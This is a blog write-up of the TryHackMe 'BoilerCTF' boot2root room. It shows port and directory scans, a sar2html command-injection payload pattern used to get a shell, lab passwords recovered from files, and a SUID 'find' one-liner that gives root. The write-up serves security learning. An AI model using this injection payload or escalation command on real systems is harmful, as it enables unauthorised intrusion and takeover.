BoilerCTF Writeup - TryHackMe
BoilerCTF is an annoying boot2root challenge on TryHackMe. It has a lot of rabbit holes! Definitely, easy-medium level challenge if the creator didn’t put those rabbit holes.
Enumeration
As always, I started with a port scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.3.43
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
10000/tcp open http syn-ack MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 668CB370770CC6F5682CDB936F0A3CB5
55007/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8bsvFyC4EXgZIlLR/7o9EHosUTTGJKIdjtMUyYrhUpJiEdUahT64rItJMCyO47iZTR5wkQx2H8HThHT6iQ5GlMzLGWFSTL1ttIulcg7uyXzWhJMiG/0W4HNIR44DlO8zBvysLRkBSCUEdD95kLABPKxIgCnYqfS3D73NJI6T2qWrbCTaIG5QAS5yAyPERXXz3ofHRRiCr3fYHpVopUbMTWZZDjR3DKv7IDsOCbMKSwmmgdfxDhFIBRtCkdiUdGJwP/g0uEUtHbSYsNZbc1s1a5EpaxvlESKPBainlPlRkqXdIiYuLvzsf2J0ajniPUkvJ2JbC8qm7AaDItepXLoDt
| 256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLIDkrDNUoTTfKoucY3J3eXFICcitdce9/EOdMn8/7ZrUkM23RMsmFncOVJTkLOxOB+LwOEavTWG/pqxKLpk7oc=
| 256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPsAMyp7Cf1qf50P6K9P2n30r4MVz09NnjX7LvcKgG2p
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
I started by visiting the web server on port 80. The page was the default Apache page. I ran gobuster to find any hidden directories:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~]
└─$ gobuster dir --url $url --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 70
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.135.65
[+] Method: GET
[+] Threads: 70
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/manual (Status: 301) [Size: 313] [--> http://10.10.135.65/manual/]
/joomla (Status: 301) [Size: 313] [--> http://10.10.135.65/joomla/]
/server-status (Status: 403) [Size: 300]
We have two directories: /manual and /joomla. I visited the /joomla directory and found a Joomla website. I ran a Joomla scan using joomscan. However, there was nothing useful.
I then run gobuster on the /joomla directory:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
┌──(kali㉿kali)-[/tmp]
└─$ gobuster dir --url $url/joomla --wordlist /usr/share/wordlists/dirb/common.txt -t 70
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.145.140/joomla
[+] Method: GET
[+] Threads: 70
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 304]
/.hta (Status: 403) [Size: 299]
/_test (Status: 301) [Size: 321] [--> http://10.10.145.140/joomla/_test/]
/~www (Status: 301) [Size: 320] [--> http://10.10.145.140/joomla/~www/]
/administrator (Status: 301) [Size: 329] [--> http://10.10.145.140/joomla/administrator/]
/.htpasswd (Status: 403) [Size: 304]
/_archive (Status: 301) [Size: 324] [--> http://10.10.145.140/joomla/_archive/]
/_files (Status: 301) [Size: 322] [--> http://10.10.145.140/joomla/_files/]
/_database (Status: 301) [Size: 325] [--> http://10.10.145.140/joomla/_database/]
/bin (Status: 301) [Size: 319] [--> http://10.10.145.140/joomla/bin/]
/build (Status: 301) [Size: 321] [--> http://10.10.145.140/joomla/build/]
/cache (Status: 301) [Size: 321] [--> http://10.10.145.140/joomla/cache/]
/components (Status: 301) [Size: 326] [--> http://10.10.145.140/joomla/components/]
/images (Status: 301) [Size: 322] [--> http://10.10.145.140/joomla/images/]
/includes (Status: 301) [Size: 324] [--> http://10.10.145.140/joomla/includes/]
/installation (Status: 301) [Size: 328] [--> http://10.10.145.140/joomla/installation/]
/language (Status: 301) [Size: 324] [--> http://10.10.145.140/joomla/language/]
/layouts (Status: 301) [Size: 323] [--> http://10.10.145.140/joomla/layouts/]
/libraries (Status: 301) [Size: 325] [--> http://10.10.145.140/joomla/libraries/]
/media (Status: 301) [Size: 321] [--> http://10.10.145.140/joomla/media/]
/modules (Status: 301) [Size: 323] [--> http://10.10.145.140/joomla/modules/]
/plugins (Status: 301) [Size: 323] [--> http://10.10.145.140/joomla/plugins/]
/index.php (Status: 200) [Size: 12484]
/templates (Status: 301) [Size: 325] [--> http://10.10.145.140/joomla/templates/]
/tests (Status: 301) [Size: 321] [--> http://10.10.145.140/joomla/tests/]
/tmp (Status: 301) [Size: 319] [--> http://10.10.145.140/joomla/tmp/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Exploitation
I visited the _test directory and that page redirected me to a sar2html 3.2.1 page. I ran a searchsploit on sar2html and found an exploit:
1
2
3
4
5
In web application you will see index.php?plot url extension.
http://<ipaddr>/index.php?plot=;<command-here> will execute
the command you entered. After command injection press "select # host" then your command's
output will appear bottom side of the scroll screen.
I tried the exploit and it worked. I got a reverse shell:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ ls
ls
index.php log.txt sar2html sarFILE
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@Vulnerable:/var/www/html/joomla/_test$ ls
ls
index.php log.txt sar2html sarFILE
www-data@Vulnerable:/var/www/html/joomla/_test$ cat log.txt
cat log.txt
Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22.
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$
Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)
Aug 20 11:16:36 parrot sshd[2466]: Received disconnect from 10.10.170.50 port 49824:11: disconnected by user
Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824
Aug 20 11:16:36 parrot sshd[2451]: pam_unix(sshd:session): session closed for user pentest
Aug 20 12:24:38 parrot sshd[2443]: Received signal 15; terminating.
www-data@Vulnerable:/var/www/html/joomla/_test$
Lateral Movement
log.txt contained the password for the user basterd. I used the password to login via SSH:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali㉿kali)-[~]
└─$ ssh [email protected] -p 55007
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
8 packages can be updated.
8 updates are security updates.
Last login: Thu Aug 22 12:29:45 2019 from 192.168.1.199
$ ls
backup.sh
$ ls -lah
total 16K
drwxr-x--- 3 basterd basterd 4.0K Aug 22 2019 .
drwxr-xr-x 4 root root 4.0K Aug 22 2019 ..
-rwxr-xr-x 1 stoner basterd 699 Aug 21 2019 backup.sh
-rw------- 1 basterd basterd 0 Aug 22 2019 .bash_history
drwx------ 2 basterd basterd 4.0K Aug 22 2019 .cache
$ cat backup.sh
REMOTE=1.2.3.4
SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log
DATE=`date +%y\.%m\.%d\.`
USER=stoner
#superduperp@$$no1know
...
...
...
Lateral Movement - 2
I found a backup script that contained the password for the user stoner. I used the password to login via SSH:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~]
└─$ ssh [email protected] -p 55007
[email protected]'s password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
8 packages can be updated.
8 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Thu Aug 22 16:05:13 2019
stoner@Vulnerable:~$
I was successfully logged in as stoner. Listed the files in the home directory:
1
2
3
4
5
6
7
8
9
stoner@Vulnerable:~$ ls
total 3.5M
drwxr-x--- 6 stoner stoner 4.0K May 14 01:26 .
drwxr-xr-x 4 root root 4.0K Aug 22 2019 ..
drwx------ 2 stoner stoner 4.0K May 14 01:09 .cache
drwxr-x--- 3 stoner stoner 4.0K May 14 01:10 .config
drwx------ 2 stoner stoner 4.0K May 14 01:26 .gnupg
drwxrwxr-x 2 stoner stoner 4.0K Aug 22 2019 .nano
-rw-r--r-- 1 stoner stoner 34 Aug 21 2019 .secret
The user flag was in the .secret file:
Privilege Escalation
I checked the sudo permissions but the creator of the challenge mocked me:
1
2
3
stoner@Vulnerable:~$ sudo -l
User stoner may run the following commands on Vulnerable:
(root) NOPASSWD: /NotThisTime/MessinWithYa
There’s no such file as `/NotThisTime/MessinWithYa
I checked ‘id’ and found that I was in the ‘lxd’ group:
1
2
stoner@Vulnerable:~$ id
uid=1000(stoner) gid=1000(stoner) groups=1000(stoner),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
I tried LXD privilege escalation using this, however, it didn’t work.
Then I enumerated the system using linpeas and found that the /usr/bin/find had the SUID bit set:
1
-r-sr-xr-x 1 root root 227K Feb 8 2016 /usr/bin/find
So we can use the find command to escalate our privileges! Haha! GO TO HELL, CHALLENGE CREATOR! LET’S ESCALATE OUR PRIVILEGES! GTFOBINS to the rescue:
1
2
3
stoner@Vulnerable:~$ /usr/bin/find . -exec /bin/sh -p \; -quit
# id
uid=0(root) gid=0(root) groups=0(root)
Ultimately, I got the root privileges and read the root flag!
Conclusion
Though I tried and learned a lot of things, the creator of the challenge was a bit annoying. There were some unnecessary rabbit holes. I hate them!
This post is licensed under CC BY 4.0 by the author.